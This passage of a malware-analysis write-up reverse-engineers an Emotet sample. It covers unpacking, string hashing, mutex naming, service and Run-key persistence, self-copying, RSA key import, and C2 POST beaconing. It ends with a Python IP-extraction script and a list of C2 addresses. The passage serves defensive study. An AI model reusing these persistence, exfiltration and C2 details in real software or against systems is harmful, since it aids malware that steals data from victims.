66 D6 B8 20 E0 94 F7 15 3A AD A9 60 12 E0 98 61 9A 4B AC 41 F3 40 72 1F 9D A8 02 8D AB 76 88 FC 7D 2C 84 C7 69 F9 79 64 93 28 D2 F9 4F EE 61 A6 39 A3 C7 65 17 B6 DA 0F D0 3B B0 49 40 49 F8 3D 5F 48 F0 AD 79 84 BA F9 2F 00 1A 77 1B 6A EC 3A 80 9F A8 71 5F 62 AE 10 65 78 80 99 D8 C5 63 85 16 A1 E3 2D A6 A5 FE A6 6E 55 A0 36 F8 10 1F 81 67 13 4D 19 4B 51 62 2D D6 FC 39 D4 9B 75 C7 E6 F7 8A 97 AB 6D 18 64 B1 8E BB E2 88 0F 8E 64 06 D6 35 04 DD 19 27 AC 99 96 4B E2 78 47 6B AB 38 9C 77 0A DE B4 52 60 AD A9 95 B0 40 51 4A 99 8F 57 63 2C 57 40 20 2B C3 8F 02 05 3D F3 8D AA 1E F6 43 ED 32 60 6B B7 4A 82 53 E3 09 CA 58 63 3E 8F 38 1D 8F F1 6E A8 96 A0 B4 74 AA 73 A2 2C BA C8 58 0C 5B 6F 22 DD CC AD 2A 51 6E 63 3C C6 30 E5 8A A5 DE 82 94 52 0E E6 10 9D 9A FE 24 73 F1 C7 A0 60 07 7E ED 9B 15 62 B5 37 52 5F 47 68 E5 FA 23 A0 CC 82 F8 77 7A E3 41 C0 8C 92 58 D5 E3 8C D6 E3 C8 9D CC 12 90 C6 B2 CF E8 EB F1 26 E0 25 E1 AF 0A 1B 8C A4 D1 31 3A 69 66 B7 42 74 23 6B BA 4E 39 A7 18 16 4A 45 9F 86 08 DB 96 60 FE D6 39 49 50 C9 F1 D1 4C C7 46 C3 58 2B 16 2D 21 89 18 B3 E6 B3 E6 E2 46 BC 10 BE F4 76 9D EC 51 21 16 01 4F 00 1F D0 02 E0 12 D5 B2 87 15 51 81 72 5A B6 0D 1F 1C 54 F3 E0 D6 11 6B 4E 50 3B 9D FE 22 B2 E0 BA B8 9F C2 13 B0 44 EB 72 03 1B 39 27 38 2D 1A 03 28 2A 87 D1 F2 AB E4 EA 59 04 2B 92 05 DC 09 3E 43 C0 BF F8 3E D7 28 AA E5 CB 8E 96 F8 A4 1F 76 81 0D A5 5E F9 3A 7D DD 64 D3 86 4C FE D8 45 01 62 BD 34 FC 3E DF 58 A0 70 D7 0B 91 7B 69 F1 9E CA AF A9 3D 28 BB C6 36 77 7A 16 D6 18 11 4F B4 EF EC F2 8B 07 E8 EE A5 84 B1 F0 11 67 EC 71 15 8A 7F 6D 0F DD 7E 03 06 53 F7 2B 40 9D 0D 20 6D 66 AB 61 97 3B C6 0E DD 2A B2 06 B9 E4 6D BF C3 33 BD 27 76 35 87 6A 9B A4 A7 D7 5B 1E A2 E7 36 20 0B 85 1B F7 7A DA EE 61 54 0A B7 A6 14 34 40 97 FA C1 79 29 E4 B6 E0 C5 C3 AD 40 0A 85 9F 44 92 E8 80 3E 99 52 EB 52 17 BE F4 0B 08 02 D3 F8 D0 F6 3E 1C 0E F4 8E 33 9B D9 D8 79 7E 03 52 3E 3B 3F 0C 2B 33 87 0D 34 73 32 79 85 31 62 F3 0C 95 09 50 8A 26 F5 FE 57 DC D4 39 09 BD 08 B1 88 3F 1C 40 9E A4 2E 94 FA DE 75 09 DF BA 02 DA 16 37 8D FE 3D 67 BF 6A 98 99 43 2C 4D E7 7F 0A 62 E6 FC 68 C1 94 8B F3 D3 D5 D9 BE 1A 0D 44 12 8B 77 6D 21 BD E4 1D B3 8C 2F 33 D4 EE DF 5A DD 48 82 75 4A

Ok, We won’t analyze it, because it's related to API resolving and anyway we will know it after unpacking.

Ok, we can rename all functions now, Let’s continue:

ِAfter running the first two subroutines, It resolved the first global variable API which we found earlier in our first analysis.

now we can dump the process using Scylla with the new OEP:

Then click on, dump, then Fix Dump and choose your dumping file to resolve the imported APIs, now we have a lot of APIs for analyzing, 81 APIs called from kernel32.dll and 7 from ntdll.dll. 10 APIs not resolved.

You can find these APIs in the strings of your dumped file and you can now open it in IDA for analyzing with x32Debugger.

Real Code Analysis:

We need to analyze important subroutines only, Let’s analyze from the Start subroutine:

First, The malware takes the Malware Path by calling GetModuleFileNameW API then the path the return value to the GetTheHardcoded subroutine which multiplies it to

This code takes a file path as input in the ECX register and calculates a hash value for the file path using a loop that multiplies the current hash value by a constant (1003Fh), adds the next character of the file path and then moves to the next character. The loop continues until it reaches the end of the file path (when the next character is zero). The final hash value is returned from the function in the EAX register.

So This is what we found in the unpacking process, now we know How Emotet finds the Hardcode of any string he wants.

Here is the opinion of Chat-GPT:

The code you provided appears to be a hash function that calculates a hash value for a given file path. This code could be useful in a variety of contexts, including malware.

Here are some possible reasons why malware might use this code:

File identification: Malware might use this code to identify files with specific names or locations on an infected system. By hashing the file path, the malware can quickly compare the resulting hash value to a list of known hashes to determine if the file is a target for further exploitation.
Anti-analysis techniques: Malware might use this code to make it harder for analysts to reverse engineer the file paths used by the malware. By hashing the file path, the malware can obscure the original path, making it harder for analysts to identify which files the malware is targeting.
Persistence: Malware might use this code to persistently monitor specific files or directories on an infected system. By hashing the file path and comparing it to a list of known hashes on a regular basis, the malware can detect when a file has been added, deleted, or modified and take appropriate action (such as copying itself to a new location or launching a new attack).

OK, That’s Why Emotet uses Hardcoded values for any string he wants.

Let’s Continue:

Then, the malware put Specific HardCoded Value with a list of hardcoded values to call the decryption subroutine:

figure 87

The malware has These Hashes value, and puts 16AD7ADBh value with the Hash value of the malware path,

16AD7ADFh, 6E8857F6h, 0DA35E132h, 2EB38AC2h, 0E30B6808h , 480F678Dh, 58D9BFA6h, 80A3C3DCh, 9C88757h, 27BF10D6h

I won’t analyze the encryption function, just step over it:

The malware returns this output ” — %x” which is a format string using to _snwprintf API with the hash value of the Malware Path

After Running it:

Wow, Do you remember this value? We found it while running the malware: [ Yes, it’s the command line ].

So now, we know what the command line refers to, It’s the hash value of array chars of the Malware Path which each value multiplies to 10003Fh and then +2.

Then the Malware GetCommandLineW of the current process and its length will save in ESI.

Then take the length of the string ” — 26e05b8e” which we got earlier then sub from it the length of the command line.

It gives you the process name,

now let’s see the main malware loop:

EDI -> The return value of GetCommandLineW API, ESI -> The Process Name like “malware.exe”.

if the process name exists in the command line, call the CreateProcess function.

else, if the Malware command [ — 26e05b8e] exists in the process command line, call the MalwareMain function, else, continue the loop.

So, When the Malware executes with the command line [ — 26e05b8e], it calls the MalwareMain function, else, Call the CreateProcess function.

Let’s see the CreatingProcess function,

It calls the CreateProcessW API To itself with the command line [ — 26e05b8e], hhh, he wants to execute the MalwareMain function.

Ok, Let’s go to the MalwareMain function:

It takes GetTickCount and takes modules of its return value to 4000 which Will be used in Anti-Debugging Trick,

Calls Two subroutines related to VolumeSerialNumber and Mutex then call the DynamicAPICall subroutine, Let’s see the first subroutine:

First, Call GetWindowsDirectoryW to get the path of the windows [C:\Windows], then find the backslash from the path to get the C:\\ drive, then Call the GetVolumeInformationW API.

As you can see, the 4th argument is a pointer to a variable for receiving the serial number of the C:\\ drive which in my case is EE85EDF4 [ Memory stores values in Little-Endian ],

What’s the Serial Number? Asked to Chat-GPT

Serial numbers are commonly used as a unique identifier for a particular device or object. In the context of computers and file systems, serial numbers can be used to uniquely identify a particular disk drive or partition, and may be used by various software applications for verification or licensing purposes. For example, some software applications may use the serial number of a particular disk drive as a way to ensure that the software is only installed on a licensed machine, or to prevent unauthorized copying or distribution of the software.

Why malware uses serial numbers? Asked to Chat-GPT

The malware may be using the serial number of the C drive as a way to uniquely identify a victim’s machine. This information can be used for various purposes, such as tracking the spread of the malware, identifying specific victims for targeted attacks, or to prevent the malware from executing on machines where it has already been installed. Additionally, the malware may be designed to use the serial number as a key to unlock additional features or functionality in the malware itself. It is important to note that the use of such techniques is typically indicative of a malicious intent and may be a sign that the malware is attempting to evade detection or analysis.

Let’s see, How Emotet Malware can use it, Here’s the Xref for the Serial Number value, he using it for Mutants,

Let’s see the second function which is called MutexEvent,

It calls three functions for creating Mutex and Event, which we found in the ProcessHacker tool in the Behavioral Analysis section, let’s see the first CreatingMutex function:

It gets the format string again using its decryption algorithm[ Global\\I%X ], and the %X format refers to the Volume Serial Number of C:\\ drive, then calls the CreateMutexW with the name “Global\IEE85EDF4”, which Value “EE85EDF4” refers to your volume number of your [C:\\] windows drive.

We know now what’re the values of the mutants, Let’s step out to continue analyzing, he using WaitForSingleObject API to ensure that only one instance of itself can access the shared resource at a time [ which is the mutex ].

If not Create Another Mutex with the name Global\MEE85EDF4[ Global\M+SerialNumberOfCdrive ],

then create an event called Global\EEE85EDF4 [ Global\E+SerialNumberOfCdrive ].

After executing, we can see the handles now:

Gool, We did a great job of identifying the mutants and The Event, let’s continue, Now, it’s time to see the last function in the MalwareMain function which is the real malware main function and exists in the loop, so we need how the malware loop this function,

The malware has a global variable for detecting some of its behavior which I called Infected?,

if this value is zero, this means resolving the advapi32.dll library and its APIs, shell32.dll library and its APIs, and then calling the PersistenceWithServices function, then assigning one to the global Infected? value, then exit, which will be getting into again before we are in a big loop, and now the Infected is 1, let’s see the other conditions.
if this value is one, this means resolving crypt32.dll urlmon.dll, userenv.dll,wtsapi32.dll, and its APIs, then calling the Generate_PUBLICK_KEY function, if it is a success, call the GetTheInfo and declaring functions, if success, Infected? will be 2, if not, Infected? will be 3.
if this value is two, call the FinalAnalysis function.
if this value is three, SetEvent.

Real Emotet Persistence:

Let’s see PersistenceWithServices function:

We want to analyze all of them, but I’ll choose only the important function, not like calling OpenSCManager or GetModuleHandle, we know it, let’s analyze the commands function:

But as you can see, it makes some behavior and then makes persistent with services or processes.

Again, he calls the decryption function for getting a lot of strings related to commands or URLs to the C2 Server, we will know later how he uses it.

Pushing “sizesxcl” string again to a function with these commands to return strings again.

And the second function is for getting the AppData path from your machine, which BOOL value is a hand for OpenSCManager, in two cases, he will get the APP Data Folder:

Here, calling the SHGetFolderPathW API for CSIDL_LOCAL_APPDATA flag to get the AppData/Local folder in your machine, which in my case is:

C:\Users\User\AppData\Local

then concatenate it with “sizesxcl” string,

C:\Users\User\AppData\Local\sizesxcl

which is the folder we found in our behavioral analysis.

then get the last result:

C:\Users\User\AppData\Local\sizesxcl\sizesxcl.exe

which is:

%AppData%/sizesxcl/sizesxcl.exe

%AppData%/someString/someString.exe which got from two of these strings:

engine,finish,magnify,resapi,query,skip,wubi,svcs,router,crypto,backup,hans,xcl,con,edition,wide,loada,themes,syc,pink,tran,khmer,chx,excel,foot,wce,allow,play,publish,fwdr,prep,mspterm,nop,define,chore,shlp,maker,proc,cap,top,tablet,sizes,without,pen,dasmrc,move,cmp,rebrand,pixel,after,sms,minimum,umx,cpls,tangent,resw,class,colors,generic,license,mferror,kds,keydef,cable

getting the CSIDL_SYSTEMX86 path which in my case is:

C:\Windows\SysWOW64

And then get the full path:

C:\Windows\SysWOW64\sizesxcl.exe

which “sizesxcl” is two of a lot of strings that we discussed earlier.

Ok, now we have two possible folders for Emotet Malware IOCs,

name of the file is

files[]=” engine,finish,magnify,resapi,query,skip,wubi,svcs,router,crypto,backup,hans,xcl,con,edition,wide,loada,themes,syc,pink,tran,khmer,chx,excel,foot,wce,allow,play,publish,fwdr,prep,mspterm,nop,define,chore,shlp,maker,proc,cap,top,tablet,sizes,without,pen,dasmrc,move,cmp,rebrand,pixel,after,sms,minimum,umx,cpls,tangent,resw,class,colors,generic,license,mferror,kds,keydef,cable” ;

Then create a file one of the files[i] to:

C:\Windows\SysWOW64\files[i]+files[i].exe OR %CSIDL_SYSTEMX86%\files[i]+files[i]

C:\Users\User\AppData\Local\files[i]+files[i]\files[i]+files[i].exe OR %AppData%\files[i]+files[i]\files[i]+files[i].exe

Also, it’s a URLs.

From now we can use files[i] = files[i]+files[i]

Let’s continue:

Then the malware gets the CRC32 of its executable then saves it to a global variable I called crc32 by calling:

CreateFileW, CreateFileMappingW, MapViewOfFile, GetFileSize, RtlComputeCrc32, UnmapViewOfFile.

What’s CRC32 and Why is Malware using it? asked to Chat-GPT:

CRC32 (Cyclic Redundancy Check 32) is a type of hash function that is commonly used in digital data transmission and storage to detect accidental changes to raw data. It generates a fixed-size, checksum value for a given data input, which can be compared with the original checksum to check for any data errors or corruption.

Malware authors often use CRC32 in order to verify the integrity of their own code or data payloads. By including a CRC32 checksum in their malware, they can ensure that the payload has not been tampered with during transmission or deployment. This helps to ensure that the malware functions correctly and avoids detection by security software that might flag it as suspicious.

However, it is important to note that not all use of CRC32 is malicious or illegal. CRC32 is a legitimate and widely-used technique in many different areas of computing, including file compression and error detection. It is only when it is used as part of a malicious payload or for other nefarious purposes that it becomes a problem.

Then a big function for computer name and driver volume serial number calculation:

First, Get the Computer name of your machine by calling GetComputerNameW API then translate the string to UTF-8 encoding by calling WideCharToMultiByte API:

Then, make some regular expression to ensure the computer name contains only [A-Za-z0–9], else, remove the char and replace it with “X”,

input: DESKTOP-1VUTB81

output: DESKTOPX1VUTB81

and then concatenate it with the C drive volume serial number to become the last string is:

OutputedComputerName_CdriveSerialNumber

DESKTOPX1VUTB81_EE85EDF4 [ in my case ].

The second function for removing a file which I think it’s related to its old variant:

the file name is taken twice from one of these strings:

Then again get one of these files which depends on if the OpenSCManager handle exists or not:

C:\Windows\SysWOW64

C:\Users\User\AppData\Local\

then concatenate it to a string taken twice from the listed I write to .exe, then, Delete this file:

which will delete in my case:

C:\Users\User\AppData\Local\machinemachine.exe OR C:\Windows\SysWOW64\machinemachine.exe

again, it’s depending on your machine with strings:

files[i] = "chunk,counter,drawa,isve,two,next,mapi,rtapi,nlsdl,defs,tenant,rstrt,window,machine,mira,system,stream,cursor,structs,history,watched,hash,report,program,durable,offc,rsat,folders,shell,yellow,sounds,adjust,toner,tlb,sorted,loop,post,txt,icons,intel,inset,move,reports,trc,based,wim,lumber,violet,dom,easy,cvt,center,even,readand,xinput,mem,cues,layer,tools,wfd,running,mail,gesture,misc";

C:\Windows\SysWOW64\files[i]+files[i].exe OR %CSIDL_SYSTEMX86%\files[i]+files[i]
C:\Users\User\AppData\Local\files[i]+files[i].exe OR %AppData%\files[i].exe+files[i]

After calling all of these, he made a comparison to the current Malware Path with the 2 paths he wants, if the same, return, if not, continue.

2 Paths is:

C:\Windows\SysWOW64\files[i].exe OR %CSIDL_SYSTEMX86%\files[i]

C:\Users\User\AppData\Local\files[i]\files[i].exe OR %AppData%\files[i]\files[i].exe

which we got earlier.

Let’s continue and analyze the IOCs_files function:

First, he creates the file first:

C:\Windows\SysWOW64\files[i].exe OR %CSIDL_SYSTEMX86%\files[i]

C:\Users\User\AppData\Local\files[i]\files[i].exe OR %AppData%\files[i]\files[i].exe

Then, he copies the content of its executable to these files, Yes, it’s a VIRUS, but in a different technique:

he uses SHFileOperationW API for copying itself by putting the FileOp.pFrom flag to the current malware path and putting the FileOp.pTo flag to the created file.

and now the files:

C:\Windows\SysWOW64\files[i].exe OR %CSIDL_SYSTEMX86%\files[i]

C:\Users\User\AppData\Local\files[i]\files[i].exe OR %AppData%\files[i]\files[i].exe

has the same content as the Emotet malware, which we saw in the behavioral analysis.

and then, calling GetTempPathW for getting the temp folder and calling GetTempFileNameW for getting get the temp file name like 2B21.tmp, and then copying the content of the malware to it.

%temp%\{random}.tmp includes the same Emotet executable content.

then delete Zone Identifier from:

C:\Windows\SysWOW64\files[i].exe OR %CSIDL_SYSTEMX86%\files[i]

C:\Users\User\AppData\Local\files[i]\files[i].exe OR %AppData%\files[i]\files[i].exe

which we found in the behavioral analysis.

then running one of all of these files with service or process:

He creates a service under the name: “sizesxcl” with a path: %AppData%\sizesxcl\sizesxcl.exe which is the malware 2nd stage, Auto start service.

Then Starting the service to run the malware, the handle is zero in my case because I change the program behavior.

SC_HANDLE CreateServiceA(
  [in]            SC_HANDLE hSCManager,
  [in]            LPCSTR    lpServiceName,
  [in, optional]  LPCSTR    lpDisplayName,
  [in]            DWORD     dwDesiredAccess,
  [in]            DWORD     dwServiceType,
  [in]            DWORD     dwStartType,
  [in]            DWORD     dwErrorControl,
  [in, optional]  LPCSTR    lpBinaryPathName,
  [in, optional]  LPCSTR    lpLoadOrderGroup,
  [out, optional] LPDWORD   lpdwTagId,
  [in, optional]  LPCSTR    lpDependencies,
  [in, optional]  LPCSTR    lpServiceStartName,
  [in, optional]  LPCSTR    lpPassword
);
CreateServiceW(handle, 
"sizesxcl", 
"sizesxcl",
SC_MANAGER_ENUMERATE_SERVICE, 
SERVICE_WIN32_OWN_PROCESS, 
SERVICE_AUTO_START, 
SERVICE_ERROR_IGNORE, 
"C:\Users\User\AppData\Local\sizesxcl\sizesxcl.exe",
NULL,NULL,NULL,NULL,NULL);

And we analyzed the Creating process function before which running the malware with its command line.

We analyzed the presistWithServices function.

Let’s analyze the GeneratePUBLICK_KEY function, in which you should change the behavior of the program to it after stepping over the functions which resolve the DLLs.

[Encoded PUBLICKKEYSTRUC]
30 68 02 61 00 B9 3E 2A 51 E0 38 A5 E6 F5 E0 E4
5A ED B2 37 D9 5A 9E 3C 0E 9B A5 B6 3D 5D 2D 82
BE 26 B0 D5 5B CB 6A 4E 27 A4 B5 31 94 27 43 0C
65 EF 2E 96 5B 34 F8 92 F7 80 42 12 E6 5B C2 41 
D8 CD 8F 0C EC 59 3A 05 4C 24 7D 82 02 D9 15 5B
5A 7F 3F D8 CD 25 65 6F 8C AF 52 9A B6 CB 74 87 
A2 28 DB 51 7D 02 03 01 00 01 00 00 00 00 00 00

[Decoded PUBLICKKEYSTRUC]
06 02 00 00 00 A4 00 00 52 53 41 31 00 03 00 00  .....¤..RSA1....  
01 00 01 00 7D 51 DB 28 A2 87 74 CB B6 9A 52 AF  ....}QÛ(¢.tË¶.R¯  
8C 6F 65 25 CD D8 3F 7F 5A 5B 15 D9 02 82 7D 24  .oe%ÍØ?.Z[.Ù..}$  
4C 05 3A 59 EC 0C 8F CD D8 41 C2 5B E6 12 42 80  L.:Yì..ÍØAÂ[æ.B.  
F7 92 F8 34 5B 96 2E EF 65 0C 43 27 94 31 B5 A4  ÷.ø4[..ïe.C'.1µ¤  
27 4E 6A CB 5B D5 B0 26 BE 82 2D 5D 3D B6 A5 9B  'NjË[Õ°&¾.-]=¶¥.  
0E 3C 9E 5A D9 37 B2 ED 5A E4 E0 F5 E6 A5 38 E0  .<.ZÙ7²íZäàõæ¥8à
51 2A 3E B9 AB AB AB AB AB AB AB AB EE FE EE FE  Q*>¹««««««««îþîþ 

CryptAcquireContextW(&hProv, NULL, NULL, CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
CryptDecodeObjectEx(10001h, 13h, Encoded, 106, CRYPT_DECODE_ALLOC_FLAG, NULL, &PUBLICKKEYSTRUC, &PUBLICKKEYSTRUC_len);
CryptImportKey(hProv, PUBLICKKEYSTRUC, PUBLICKKEYSTRUC_len, NULL, NULL, &HCRYPTKEY);

With Chat-GPT help, here is his answer:

Based on the provided arguments for CryptImportKey, the public RSA key is encoded as a PUBLICKEYSTRUC structure in the form of a byte array. The byte array can be decoded as follows:

The first 8 bytes of the byte array represent a PUBLICKEYSTRUC header, which has the following structure:

typedef struct _PUBLICKEYSTRUC {
    BYTE bType;
    BYTE bVersion;
    WORD reserved;
    ALG_ID aiKeyAlg;
} PUBLICKEYSTRUC;

In this case, the header appears to have the following values:

bType: 06
bVersion: 02
reserved: 0000
aiKeyAlg: A4000000

This indicates that the key type is AT_KEYEXCHANGE (06), the version is 2, the reserved field is 0, and the algorithm identifier is 0x0000a400 (CALG_RSA_KEYX).

2. The remaining bytes represent an RSAPUBKEY structure, which has the following format:

typedef struct _RSAPUBKEY {
    DWORD magic;
    DWORD bitlen;
    DWORD pubexp;
} RSAPUBKEY;

In this case, the RSAPUBKEY appears to have the following values:

magic: 31415352 (ASCII code for "RSA1")
bitlen: 00000200 (512 bits)
pubexp: 00010001 (65537 in decimal)

3. The remaining bytes represent the modulus of the RSA key. In this case, the modulus appears to be a 512-bit value in little-endian byte order, represented by the following hex-encoded string:

7D51DB28A28774CBB69A52AF8C6F6525CDD83F7F55A5B15D902827D244C053A59EC0C8FCD\
D841C25BE6124280F792F8345B962EEF650C43279431B5A4274E6ACB5BD5B026BE822D5D3\
DB6A59B0E3C9E5AD937B2ED5AE4E0F5E6A538E0512A3EB9ABABABABABABABABEEFEEEFE

Therefore, the public RSA key can be represented in PEM format as follows:

Thanks, Chat-GPT, I extract this info by myself, but he faster than me hhh.

We analyzed this part which calls CryptAcquireContextW , CryptDecodeObjectEx, CryptImportKey APIs:

Then, he used CryptGenKey, CryptCreateHash APIs :

/*
[Encoded PUBLICKKEYSTRUC]
30 68 02 61 00 B9 3E 2A 51 E0 38 A5 E6 F5 E0 E4
5A ED B2 37 D9 5A 9E 3C 0E 9B A5 B6 3D 5D 2D 82
BE 26 B0 D5 5B CB 6A 4E 27 A4 B5 31 94 27 43 0C
65 EF 2E 96 5B 34 F8 92 F7 80 42 12 E6 5B C2 41 
D8 CD 8F 0C EC 59 3A 05 4C 24 7D 82 02 D9 15 5B
5A 7F 3F D8 CD 25 65 6F 8C AF 52 9A B6 CB 74 87 
A2 28 DB 51 7D 02 03 01 00 01 00 00 00 00 00 00

[Decoded PUBLICKKEYSTRUC]
06 02 00 00 00 A4 00 00 52 53 41 31 00 03 00 00  .....¤..RSA1....  
01 00 01 00 7D 51 DB 28 A2 87 74 CB B6 9A 52 AF  ....}QÛ(¢.tË¶.R¯  
8C 6F 65 25 CD D8 3F 7F 5A 5B 15 D9 02 82 7D 24  .oe%ÍØ?.Z[.Ù..}$  
4C 05 3A 59 EC 0C 8F CD D8 41 C2 5B E6 12 42 80  L.:Yì..ÍØAÂ[æ.B.  
F7 92 F8 34 5B 96 2E EF 65 0C 43 27 94 31 B5 A4  ÷.ø4[..ïe.C'.1µ¤  
27 4E 6A CB 5B D5 B0 26 BE 82 2D 5D 3D B6 A5 9B  'NjË[Õ°&¾.-]=¶¥.  
0E 3C 9E 5A D9 37 B2 ED 5A E4 E0 F5 E6 A5 38 E0  .<.ZÙ7²íZäàõæ¥8à
51 2A 3E B9 AB AB AB AB AB AB AB AB EE FE EE FE  Q*>¹««««««««îþîþ

-----BEGIN RSA PUBLIC KEY-----
MIIBCgKCAQEAnVHbKPJ3y7aaUr+MbmUlzdg/X1pbbRXZAiAnfSRMMFU6WewMjNYsDWM8jNjS
6bFHUv/XVZjK1Z/MUpzLR6FS1KJjxrLhlGSt9o+pPdtF+EcLQs1sOlDCnEJyKjOzC1km2ru
+22X9jxpPlJxrbO1OZaOTdWp+OprV7MYuJAd00vV0Yex8Icc2r7q3j0w+5ep2W5HpAXH7zj
pzwNvBRVKeY9NQr7r3q+3g==
-----END RSA PUBLIC KEY-----

*/
CryptAcquireContextW(&hProv, NULL, NULL, CRYPT_VERIFYCONTEXT | CRYPT_SILENT);
CryptDecodeObjectEx(10001h, 13h, Encoded, 106, CRYPT_DECODE_ALLOC_FLAG, NULL, &PUBLICKKEYSTRUC, &PUBLICKKEYSTRUC_len);
CryptImportKey(hProv, PUBLICKKEYSTRUC, PUBLICKKEYSTRUC_len, NULL, NULL, &HCRYPTKEY);
CryptGenKey(hProv, CLAG_AES_128, 1, &hKey);
CryptCreateHash(hProv, CALG_SHA1, NULL, NULL, &hHash);

so, Here is a brief explanation of each call:

CryptAcquireContextW: This function is used to acquire a handle to a cryptographic service provider (CSP) and optionally create a new key container. In this case, the flags CRYPT_VERIFYCONTEXT and CRYPT_SILENT are specified, which indicate that the CSP will only be used for verifying signatures and that no UI prompts should be displayed.
CryptDecodeObjectEx: This function is used to decode a DER-encoded ASN.1 data structure into a C data structure. The first argument (10001h) specifies the encoding type (X509_PUBLIC_KEY_INFO) and the second argument (13h) specifies the object identifier (OID) of the RSA public key. The Encoded parameter contains the DER-encoded data to be decoded, and PUBLICKKEYSTRUC and PUBLICKKEYSTRUC_len are pointers to receive the decoded data.
CryptImportKey: This function is used to import a cryptographic key into the CSP. The PUBLICKKEYSTRUC parameter contains the decoded RSA public key data, which is imported into the CSP with the specified handle hProv. The resulting key handle is returned in HCRYPTKEY.
CryptGenKey: This function is used to generate a new symmetric key. The CLAG_AES_128 parameter specifies the algorithm to be used (AES-128), and the flag 1 indicates that the key should be exportable. The resulting key handle is returned in hKey.
CryptCreateHash: This function is used to create a new hash object. The CALG_SHA1 parameter specifies the hash algorithm to be used (SHA-1), and the resulting hash object handle is returned in hHash.

Let’s analyze the last function which I named to MalwareMainFunc:

First, The Emotet take a snapshot of All running process, and loop throw it to make some behavior, let’s analyze sub_312255:

He first takes the hash of the process name, then saves it to a buffer, let’s see in detail:

He ensures the process name is in A-Z, then takes its hash [ we explain it in the first code analysis section ].

Then comparing if the process is related to the system or the same current process running, exit to the second process.

Then comparing the process is the same as the last hash or not [ to ensure he does not take the same process ].

Then copy the process name to a buffer he created, and the EBX value which process hash, the processes names is in the same buffer:

Then exit this function and take all the processes to only one buffer:

Then compress these data and encrypt it:

Then get the IP address of the C2 server which is 201.184.105.242, 24.45.195.162:

Then get the URL page from a strings list:

teapot,pnp,tpt,splash,site,codec,health,balloon,cab,odbc,badge,dma,psec,cookies,iplk,devices,enable,mult,prov,vermont,attrib,schema,iab,chunk,publish,prep,srvc,sess,ringin,nsip,stubs,img,add,xian,jit,free,pdf,loadan,arizona,tlb,forced,results,symbols,report,guids,taskbar,child,cone,glitch,entries,between,bml,usbccid,sym,enabled,merge,window,scripts,raster,acquire,json,rtm,walk,ban.

then get the URL based on your machine, with the referer header:

Referer: http://%s/%s..Content-Type: application/x-www-form-urlencoded..DNT: 1

then with the IP and the URL got from your machine:

Referer: http://201.184.105.242/cone/enable/pdf/..Content-Type: application/x-www-form-urlencoded..DNT: 1

Referer: http://24.45.195.162/acquire/glitch/taskbar/..Content-Type: application/x-www-form-urlencoded..DNT: 1

Then get the your user-agent or his user-agent:

Mozilla/4.0 (compatible; MSIE 8.0; Windows Phone OS 7.5; Trident/4.0; IEMobile/8.0)

Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.9200

Mozilla/5.0 (Windows NT 6.2; WOW64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102Safari/537.36 Edge/18.9200

Then make a POST request to the C2 Server with data collected from the machine, process names, computer-name in an encoded format, and some hardcoded data collected,

fSl6GrP52AOL=gHRQVME21L%2FUCsK%2BBzGQxsdYaDuXXXXXXXX8hyi%2B6b9n4NGaB8Yda4urh0HwChJH24F1OX6%2FH4DPfKXhgQ275UBPJH0sv%2BOq3cgqh2zVq4K%2Bie8mXMvuHoBpROf9LGlUwRb7qlxyd42y%2F9pQsVH%2F0X9dAAJPbosS4ya8e02LRZ27pIzyABSXho1n7sV9Y5TlhuqQD51KLQ7HlgdZxl417AFABCkX6C502JfyjCKPr%2BuDV1GA5eQsTx%2BW0nEoyInE2ZKuzRw5BUTL6ena1OljUbzHDgqX5X1JRdkc0NGu8QD8gmpYDMuKFZKkbiEMtVX1y9XsCOo7sU6W8Ua%2ByfTQ%2F%2FnK1Z%2B27KWHfSPGvN%2FprAMbRo%2FfNzvIH%2BlW8OXl3Kj9Xrs5VTpTNcS5a5mKz4gTwLm93h4%2Br2f3qjMk9trd5v5%2Ft8KjwYEnR5O4OZa4h4Q7FkQ0g07CvJ0opWx8H%2B1zSWgj0vJZONidzo8ehV63OG72aU9xVUcW6jM%2BzTnnp2ZVmsnKjIok%2BnXJGd05ylnIbckk2klqY3BqtJowpZKjplZkjn1ej7Vav0LDvyjl97k0U8g6w%2BH2zTudJ%2B1gBjC0%2F9X9g%3D%3D

He sets a value in a Run Registry key:

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

under the name: sizesxcl

with path:

C:\Users\User\AppData\Local\sizesxcl\sizesxcl.exe

with these names chosen based on a list that I wrote earlier.

Also creating a file in the program data folder: C:\ProgramData\ZmV3gQDwbARDj.exe which has a random name also and its content has the same as the Emotet Main File. Then Create a process for running it.

Finding All C2 Server:

While trying to understand how Emotet gets the IPs, I found its secret way for it:

Let’s see in the x32 Debugger:

Finallllly, we got all IPs, Alhamdullah.

and Chat-GPT helping me for getting all IPs, hhh

And here is a Python Script for getting all IPs:

I Take the memory dump, then get only hex values, then replace all hex values with decimal values and put a dot between every number, then find every 4 numbers and reverse it to become a pure IP address:

import re

text = """ MEMORY DUMP 
"""

hex_values = re.findall(r"[0-9A-Fa-f]{2}(?: [0-9A-Fa-f]{2})+", text)

for hex_line in hex_values:
    hex_numbers = hex_line.split()
    decimal_numbers = [int(num, 16) for num in hex_numbers]
    ip_address = ".".join(str(num) for num in reversed(decimal_numbers[:4]))
    print(ip_address + "")

It may include a FALSE POSITIVE

201.184.105.242
239.69.1.187
24.45.195.162
222.224.27.168
24.45.195.162
188.138.32.251
94.192.225.46
178.118.0.80
80.11.163.139
206.208.1.187
133.167.80.63
166.147.27.168
198.199.114.69
35.39.31.144
80.79.23.144
178.5.1.187
192.254.173.31
166.213.31.144
67.225.229.55
42.25.31.144
190.108.228.48
145.52.3.222
62.75.187.192
204.148.31.144
185.94.252.13
158.100.1.187
94.205.247.10
75.105.0.80
211.63.71.72
104.98.31.144
59.103.164.174
123.101.0.80
192.81.213.192
32.68.31.144
27.4.80.183
63.225.1.187
190.145.67.134
194.246.31.154
115.78.95.230
32.16.1.187
104.131.11.150
12.212.31.144
95.128.43.213
102.83.31.144
212.71.234.16
42.53.31.144
178.254.6.27
168.45.27.168
86.98.25.30
85.94.0.53
91.205.215.66
139.22.31.144
188.166.253.46
73.232.31.144
80.11.163.139
38.232.0.21
186.75.241.230
130.143.0.80
190.106.97.230
246.77.1.187
78.24.219.147
